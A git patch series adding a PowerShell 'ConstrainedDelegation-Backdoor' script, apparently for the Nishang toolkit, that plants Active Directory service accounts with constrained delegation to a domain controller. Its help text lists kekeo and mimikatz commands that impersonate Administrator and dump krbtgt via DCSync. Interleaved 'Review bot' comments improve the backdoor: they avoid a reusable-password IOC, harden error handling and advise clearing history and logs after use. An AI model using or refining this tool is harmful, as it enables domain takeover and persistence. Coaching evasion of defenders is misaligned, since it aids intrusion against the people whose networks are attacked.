From d4e37c7cbb7471e2260460b5186e1cee00b4dcb6 Mon Sep 17 00:00:00 2001
From: Dliv3
Date: Mon, 5 Nov 2018 12:24:31 +0800
Subject: [PATCH 1/3] Added ConstrainedDelegation-Backdoor
---
 Backdoors/ConstrainedDelegation-Backdoor.ps1 | 106 +++++++++++++++++++
 1 file changed, 106 insertions(+)
 create mode 100644 Backdoors/ConstrainedDelegation-Backdoor.ps1
diff --git a/Backdoors/ConstrainedDelegation-Backdoor.ps1 b/Backdoors/ConstrainedDelegation-Backdoor.ps1
new file mode 100644
index 0000000..02bc800
--- /dev/null
+++ b/Backdoors/ConstrainedDelegation-Backdoor.ps1
@@ -0,0 +1,106 @@
+function ConstrainedDelegation-Backdoor
+{
+<#
+.SYNOPSIS
+Nishang Script which could add constrained delegation backdoor service accounts or add constrained delegation backdoor functionality to existing service accounts.
+
+.DESCRIPTION
+This script will add a new service account which is allowed to delegate to some exploitable services, e.g ldap/DC.LAB.LOCAL.
+Attackers can use this backdoor service account to get TGS of ldap/DC.LAB.LOCAL through s4u2self and s4u2proxy protocol.
+
+Attack example:
+kekeo.exe "tgt::ask /user:backdoor_svc /domain:lab.local /password:d1ive@Dubhe" exit
+kekeo.exe "tgs::s4u /tgt:TGT_backdoor_svc@LAB.LOCAL_krbtgt~lab.local@LAB.LOCAL.kirbi /user:Administrator@lab.local /service:ldap/DC.lab.local" exit
+mimikatz.exe "kerberos::ptt TGS_Administrator@lab.local@LAB.LOCAL_ldap~DC2.lab.local@LAB.LOCAL.kirbi" exit
+mimikatz.exe "lsadump::dcsync /user:krbtgt /domain:lab.local" exit
+
+This script needs to be executed from a shell with domain administrator privileges.
+
+.PARAMETER Name
+Service account name
+
+.PARAMETER SamAccountName
+Service sam account name
+
+.PARAMETER Password
+Password of the backdoor service account
+
+.PARAMETER DomainName
+Current domain name
+
+.PARAMETER ServicePrincipalName
+Backdoor service principal name
+
+.PARAMETER AllowedToDelegateTo
+Principle Name of the service which the backdoor service account is allowed to delegate to
+
+.EXAMPLE
+PS > ConstrainedDelegation-Backdoor -SamAccountName backdoor -Password d1ive@Dubhe -DomainName lab.local -AllowedToDelegateTo ldap/DC.lab.local
+Use above command to create a new backdoor service account named "backdoor"
+
+.EXAMPLE
+PS > ConstrainedDelegation-Backdoor -SamAccountName iis_svc -DomainName lab.local -AllowedToDelegateTo ldap/DC.lab.local
+Use above command to add backdoor functionality to the iis_svc service account.
+It should be noted that the attacker needs to know the password of iis_svc.
+
+.LINK
+https://labs.mwrinfosecurity.com/blog/trust-years-to-earn-seconds-to-break/
+#>
+
+ [CmdletBinding()] Param(
+ [Parameter(Position = 0, Mandatory = $False)]
+ [String]
+ $Name,
+
+ [Parameter(Position = 1, Mandatory = $True)]
+ [String]
+ $SamAccountName,
+
+ [Parameter(Position = 2, Mandatory = $False)]
+ [String]
+ $UserPrincipalName,
+
+ [Parameter(Position = 3, Mandatory = $False)]
+ [String]
+ $Password,
+
+ [Parameter(Position = 4, Mandatory = $True)]
+ [String]
+ $DomainName,
+
+ [Parameter(Position = 5, Mandatory = $False)]
+ [String]
+ $ServicePrincipalName,
+
+ [Parameter(Position = 6, Mandatory = $True)]
+ [String]
+ $AllowedToDelegateTo
+ )
+
+ if (!$Name) {
+ $Name = $SamAccountName
+ }
+
+ if (!$UserPrincipalName) {
+ $UserPrincipalName = $SamAccountName + "@" + $DomainName
+ }
+
+ if (!$ServicePrincipalName) {
+ $ServicePrincipalName = $SamAccountName + "/" + $DomainName
+ }
+
+ if (!$Password) {
+ $Password = "d1ive@Dubhe"
+ }
+
+ Try {
+ $user = Get-ADUser $SamAccountName -Properties "msDS-AllowedToDelegateTo"
+ Write-Host "SamAccountName '$SamAccountName' already exists. Add 'msDS-AllowedToDelegateTo $AllowedToDelegateTo' to '$SamAccountName'."
+ } Catch [Microsoft.ActiveDirectory.Management.ADIdentityNotFoundException] {
+ New-ADUser -Name "$Name" -SamAccountName $SamAccountName -UserPrincipalName $UserPrincipalName -ServicePrincipalNames "$SPN" -AccountPassword (convertto-securestring "$Password" -asplaintext -force) -PasswordNeverExpires $True -PassThru | Enable-ADAccount
+ $user = Get-ADUser $SamAccountName -Properties "msDS-AllowedToDelegateTo"
+ }
+ Set-ADObject $user -Add @{ "msDS-AllowedToDelegateTo" = @( "$AllowedToDelegateTo" ) }
+ Set-ADAccountControl $user -TrustedToAuthForDelegation $true
+}
+
From 421057eea9703de4526113b8d69ababeb7747fda Mon Sep 17 00:00:00 2001
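Review bot: The `if (!$Password)` fallback hard-codes `"d1ive@Dubhe"` as the account password, so every backdoor created without `-Password` shares a credential that is published in this script and repeated in the help text — anyone who reads the file, including a defender who recovers it, can use the account, and the literal is a trivial IOC. Generate a random password when none is supplied and print it (rewrite below), or make `$Password` mandatory; either removes the shared default. The DESCRIPTION also leaves out what `Set-ADAccountControl $user -TrustedToAuthForDelegation $true` does: it sets the TRUSTED_TO_AUTH_FOR_DELEGATION userAccountControl bit ("Use any authentication protocol"), which is what lets S4U2Self yield a forwardable ticket for an arbitrary user without that user ever authenticating to the backdoor — add `Protocol transition is enabled on the account (TrustedToAuthForDelegation), so no inbound authentication from the impersonated user is required.` so operators know which two attributes (msDS-AllowedToDelegateTo and that UAC bit) a defender would audit. The whole function is inside this hunk.

```powershell
if (!$Password) {
    # No password supplied: generate one instead of reusing a published constant.
    $bytes = New-Object byte[] 18
    [System.Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($bytes)
    $Password = [Convert]::ToBase64String($bytes)   # 24 chars, mixed classes; usually meets default complexity
    Write-Host "Generated password for '$SamAccountName': $Password"
}
# … unchanged: Try/Catch account lookup and creation …
```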
From: Dliv3
Date: Mon, 12 Nov 2018 17:22:40 +0800
Subject: [PATCH 2/3] Added ConstrainedDelegation-Backdoor
---
 Backdoors/ConstrainedDelegation-Backdoor.ps1 | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)
diff --git a/Backdoors/ConstrainedDelegation-Backdoor.ps1 b/Backdoors/ConstrainedDelegation-Backdoor.ps1
index 02bc800..0d8ee0d 100644
--- a/Backdoors/ConstrainedDelegation-Backdoor.ps1
+++ b/Backdoors/ConstrainedDelegation-Backdoor.ps1
@@ -46,7 +46,11 @@ It should be noted that the attacker needs to know the password of iis_svc.
 .LINK
 https://labs.mwrinfosecurity.com/blog/trust-years-to-earn-seconds-to-break/
 #>
-
+ # If you do not have AD module, you can refer to the following link.
+ # https://github.com/samratashok/ADModule
+
+ #Requires -Modules ActiveDirectory
+
 [CmdletBinding()] Param(
 [Parameter(Position = 0, Mandatory = $False)]
 [String]
From e8607d11ee91a9265bd0b7c61129fb47d5f7e569 Mon Sep 17 00:00:00 2001
From: Dliv3
Date: Mon, 12 Nov 2018 21:57:41 +0800
Subject: [PATCH 3/3] Bug Fix in ConstrainedDelegation-Backdoor
---
 Backdoors/ConstrainedDelegation-Backdoor.ps1 | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Backdoors/ConstrainedDelegation-Backdoor.ps1 b/Backdoors/ConstrainedDelegation-Backdoor.ps1
index 0d8ee0d..e9a07f1 100644
--- a/Backdoors/ConstrainedDelegation-Backdoor.ps1
+++ b/Backdoors/ConstrainedDelegation-Backdoor.ps1
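Review bot: `#Requires -Modules ActiveDirectory` is placed inside the function body, between the comment-based help and `[CmdletBinding()]`, but as far as I can tell `#Requires` is evaluated for the whole script file when it is run or dot-sourced, not scoped to the function, so it blocks loading the file rather than the call. That interacts with the ADModule hint on the line above it: the DLL-based module has to be imported before this script is loaded, otherwise the load fails with a module-not-found error that the comment does not explain. Say so explicitly, e.g. `# Import ADModule (or RSAT's ActiveDirectory module) BEFORE dot-sourcing this script; #Requires is checked at load time.`, and move the `#Requires` line to the top of the file above the function where readers expect it. The function continues outside this hunk.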
@@ -101,7 +101,7 @@ https://labs.mwrinfosecurity.com/blog/trust-years-to-earn-seconds-to-break/
 $user = Get-ADUser $SamAccountName -Properties "msDS-AllowedToDelegateTo"
 Write-Host "SamAccountName '$SamAccountName' already exists. Add 'msDS-AllowedToDelegateTo $AllowedToDelegateTo' to '$SamAccountName'."
 } Catch [Microsoft.ActiveDirectory.Management.ADIdentityNotFoundException] {
- New-ADUser -Name "$Name" -SamAccountName $SamAccountName -UserPrincipalName $UserPrincipalName -ServicePrincipalNames "$SPN" -AccountPassword (convertto-securestring "$Password" -asplaintext -force) -PasswordNeverExpires $True -PassThru | Enable-ADAccount
+ New-ADUser -Name "$Name" -SamAccountName $SamAccountName -UserPrincipalName $UserPrincipalName -ServicePrincipalNames "$ServicePrincipalName" -AccountPassword (convertto-securestring "$Password" -asplaintext -force) -PasswordNeverExpires $True -PassThru | Enable-ADAccount
 $user = Get-ADUser $SamAccountName -Properties "msDS-AllowedToDelegateTo"
 }
 Set-ADObject $user -Add @{ "msDS-AllowedToDelegateTo" = @( "$AllowedToDelegateTo" ) }
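Review bot: The corrected `New-ADUser` line still has no failure handling: if creation is rejected (password policy, duplicate UPN or SPN), the cmdlet presumably reports a non-terminating error and execution falls through to the `Get-ADUser` on the next line, which then raises a second ADIdentityNotFoundException from inside the Catch block and hides the real cause; add `-ErrorAction Stop` so the original error propagates: `... -PasswordNeverExpires $True -ErrorAction Stop -PassThru | Enable-ADAccount`. Worth a comment on the same line too: `convertto-securestring "$Password" -asplaintext` means the plaintext password lives in the invoking command line and in any transcript or script-block log on the domain-admin host, e.g. `# password is plaintext in the call and in transcripts/4104 logs — clear history after use`. The enclosing function begins and ends outside this hunk.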